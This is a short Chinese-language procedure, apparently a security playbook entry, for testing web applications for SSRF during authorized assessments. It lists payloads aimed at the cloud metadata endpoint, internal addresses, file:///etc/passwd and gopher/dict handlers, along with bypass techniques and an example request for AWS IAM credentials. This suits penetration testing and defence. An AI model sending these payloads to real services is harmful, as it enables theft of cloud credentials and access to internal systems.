何时使用
- 在进行涉及执行 SSRF 漏洞利用的安全评估时
- 在遵循相关安全事件的应急响应程序时
- 在执行计划内的安全测试或审计活动时
- 在通过实际测试验证安全控制措施时
先决条件
- 熟悉安全运营相关的概念和工具
- 具备用于安全执行的测试或实验环境访问权限
- 已安装 Python 3.8+ 及所需的依赖项
- 对任何测试活动具备适当的授权
操作步骤
- 安装依赖项:
pip install requests
- 在目标应用程序中识别接受 URL 或主机名的 URL 参数。
- 测试 SSRF 有效负载:
- 云元数据:
http://169.254.169.254/latest/meta-data/
- 内部服务:
http://127.0.0.1:port/、http://10.0.0.1/
- 协议处理器:
file:///etc/passwd、gopher://、dict://
- 绕过技术:IP 编码、DNS 重新绑定、URL 重定向
- 分析响应以确认是否存在信息泄露或内部访问。
- 生成漏洞评估报告。
# 仅限获得授权的渗透测试和实验环境使用
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
示例
AWS 元数据 SSRF
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
如果响应中包含 AWS 凭据(AccessKeyId、SecretAccessKey),则可确认 SSRF 漏洞存在,并具有严重影响。